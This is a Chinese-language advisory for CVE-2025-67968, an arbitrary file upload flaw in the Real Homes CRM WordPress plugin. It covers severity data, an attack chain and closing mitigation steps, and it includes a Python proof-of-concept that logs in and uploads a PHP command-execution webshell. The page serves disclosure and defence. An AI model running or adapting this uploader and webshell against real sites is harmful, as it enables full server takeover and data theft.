CVE-2025-67968 Real Homes CRM 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-67968

漏洞类型

任意文件上传

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

InspiryThemes Real Homes CRM

漏洞概述

CVE-2025-67968是InspiryThemes开发的Real Homes CRM WordPress插件中的一个严重安全漏洞，CVSS评分高达9.9分（满分10分）。该漏洞属于危险类型文件无限制上传（Unrestricted Upload of File with Dangerous Type）漏洞，存在于插件的1.0.0及以下所有版本中。攻击者可以利用此漏洞上传恶意文件（包括WebShell等恶意代码），从而在服务器上执行任意命令，获取完整的系统控制权。由于该漏洞的认证要求为低权限，攻击者只需拥有基本的用户账号即可发起攻击，且无需用户交互即可成功利用。该漏洞对系统的机密性、完整性和可用性都造成严重影响，企业应及时修复此漏洞以防止潜在的安全风险。

技术细节

该漏洞存在于Real Homes CRM插件的文件上传功能中。插件在处理文件上传请求时，未对上传文件的类型和内容进行充分的验证和过滤。攻击者可以通过构造恶意的文件上传请求，将包含PHP代码或其他可执行脚本的文件上传到服务器。由于插件未能正确限制上传文件类型，攻击者可以绕过安全检查上传.php、.phtml、.phar等可执行文件。上传成功后，攻击者通过访问上传的文件路径即可在服务器上执行任意代码，实现远程代码执行（RCE）。此漏洞的利用无需复杂的攻击技术，攻击者可以使用标准的HTTP POST请求即可完成文件上传操作。建议管理员立即升级插件到最新版本，或暂时禁用插件以防止攻击。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress站点的低权限账号（订阅者、贡献者等）

STEP 2

步骤2

攻击者识别目标站点安装了Real Homes CRM插件（版本<=1.0.0）

STEP 3

步骤3

攻击者构造恶意PHP文件（如WebShell），包含可执行命令的代码

STEP 4

步骤4

攻击者通过插件的文件上传接口发送POST请求，上传恶意PHP文件

STEP 5

步骤5

插件未验证文件类型和内容，直接保存恶意文件到服务器可访问目录

STEP 6

步骤6

攻击者通过HTTP请求访问上传的恶意文件路径，在服务器上执行任意命令

STEP 7

步骤7

攻击者获取服务器完全控制权，可进行数据窃取、横向移动或部署后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-67968 PoC - Real Homes CRM Arbitrary File Upload
# Target: WordPress site with Real Homes CRM plugin <= 1.0.0

def upload_shell(target_url, username, password):
    """
    Upload a PHP webshell to target server
    """
    # Login to WordPress
    login_url = target_url + '/wp-login.php'
    session = requests.Session()
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data)
    
    # Check if login successful
    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed')
        return None
    
    print('[+] Login successful')
    
    # Upload malicious file
    upload_url = target_url + '/wp-admin/admin-ajax.php'
    
    # PHP webshell content
    php_shell = '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>'
    
    files = {
        'file': ('shell.php', php_shell, 'application/x-php')
    }
    
    data = {
        'action': 'realhomes_upload_file',
        'nonce': 'attacker_controlled_or_bruteforced'
    }
    
    try:
        resp = session.post(upload_url, files=files, data=data, timeout=10)
        
        # Parse response to get uploaded file path
        if resp.status_code == 200:
            print('[+] File uploaded successfully')
            print('[+] Access shell at: ' + target_url + '/wp-content/uploads/realhomes/shell.php?cmd=whoami')
            return True
        else:
            print('[-] Upload failed')
            return False
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    upload_shell(target, user, pwd)

影响范围

Real Homes CRM <= 1.0.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）立即禁用Real Homes CRM插件或升级到最新版本；2）通过Web服务器配置禁用uploads目录的PHP执行权限（Apache使用.htaccess，Nginx配置location规则）；3）限制文件上传功能仅对管理员开放；4）部署Web应用防火墙规则拦截包含.php、.phtml等扩展名的上传请求；5）启用WordPress的暴力破解防护和双因素认证，防止低权限账号被利用；6）定期审查服务器访问日志，监控异常的文件上传和访问行为。